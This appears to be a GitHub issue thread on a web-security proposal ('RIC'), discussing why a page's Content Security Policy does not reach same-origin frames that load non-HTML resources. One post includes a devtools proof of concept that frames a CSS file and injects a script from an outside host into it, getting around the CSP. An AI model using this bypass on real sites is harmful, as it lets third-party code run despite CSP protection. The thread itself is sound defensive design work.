CSP not a strong enough mechanizm for RIC implementation?

[weizman]

I was sure CSP trickles down very strongly to child realms, but this resource seems to show otherwise (resource)?

// visit example.com, open devtools and run this
// expected: script is blocked ; actual: script runs

document.write(`<head><meta http-equiv="Content-Security-Policy" content="script-src 'self' 'unsafe-inline'"></head><body>`);

setTimeout(() => {
    frame=document.createElement("iframe");
    frame.src="/css/bootstrap.min.css";
    document.body.appendChild(frame);    

    setTimeout(() => {
       script=document.createElement('script');
        script.src='//bo0om.ru/csp.js';
        window[0].document.head.appendChild(script); 
    }, 500);
}, 500);

This requires further investigation

[weizman]

Actually, maybe that makes sense, and maybe what I remembered was how same origin realms that do not load remote resources (e.g. about:blank) are the ones obeying to top level CSP? Still pretty bad...

[mhofman]

Duplicate of #14? Frames or popups that load a network resource would have their own CSP evaluated. Also the src of these can be controlled by the frame-src directive.

[weizman]

Not really though (on the practical level).

One of the biggest issues we had with Snow (that applies here as well) is how there's always a SO resource that doesn't follow the general CSP of the app, especially when it's not an HTML resource.

For example, x.com (which forbids unsafe-eval via CSP) will have a hard time adopting RIC because they have a massive amount of resources that are both served without CSP and are framable, for example:

And that's true to most modern web apps.

AND - frame-src can't help you here either, unless you drop self which would mostly break a bunch of other stuff.

I want RIC to solve this issue without requiring web apps to adjust their CSP servings (not because they shouldn't, but because it would take a lot of work thus they practically will never do so), so the question is how and whether it's possible given this behaviour?

[weizman]

One approach could be avoid riding the CSP mechanizm for applying the RIC script, and instead ride the internal mechanizm in browsers that constructs the WindowProxy object every time it reloads (iframe dom reposition, iframe/popup src relocation, etc)

Because that phase is very deterministic in telling when the WindowProxy should be reconstructed, and whether it represents an XO or a SO realm to top.

[weizman]

This issue remains open for now given how it isn't addressed by #22 due to how it requires some further investigation